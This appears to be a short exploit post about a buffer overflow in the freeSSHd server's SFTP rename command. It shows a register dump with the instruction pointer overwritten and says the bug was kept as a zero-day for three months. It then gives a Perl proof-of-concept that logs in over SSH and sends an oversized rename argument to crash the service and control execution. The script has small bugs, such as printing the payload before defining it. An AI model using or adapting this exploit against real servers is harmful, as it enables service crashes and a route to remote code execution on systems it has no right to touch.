freeSSHd (rename) Buffer Overflow Vulnerability

http://www.milw0rm.com/exploits/6800 <– Same vuln just further research

Registers

EAX 00000000

ECX 41414141

EDX 7C9037D8 ntdll.7C9037D8

EBX 00000000

ESP 001376BC

EBP 001376DC

ESI 00000000

EDI 00000000

EIP 41414141 <– Pwned

Part of the string is passed to various functions and eventually overwrites EIP.

In order to exploit some patching needs to occur. I've been trying to exploit

this vulnerability on and off in my spare time.

0day for 3 months :)

Written by r0ut3r (writ3r [at] gmail.com)

use Net::SSH2;

my $user = "root";
my $pass = "yahh";

my $ip = "127.0.0.1";
my $port = 22;

my $ssh2 = Net::SSH2->new();

print "[+] Connecting…\n";
$ssh2->connect($ip, $port) || die "[-] Unable to connect!\n";
$ssh2->auth_password($user, $pass) || "[-] Incorrect credentials\n";
print "[+] Sending payload\n";

my $junk = 'A' x 317;
my $eip = 'BBBB';

print $payload;
my $payload = $junk.$eip;

my $sftp = $ssh2->sftp();
$sftp->rename($payload, 'B');

print "[+] Sent";
$ssh2->disconnect;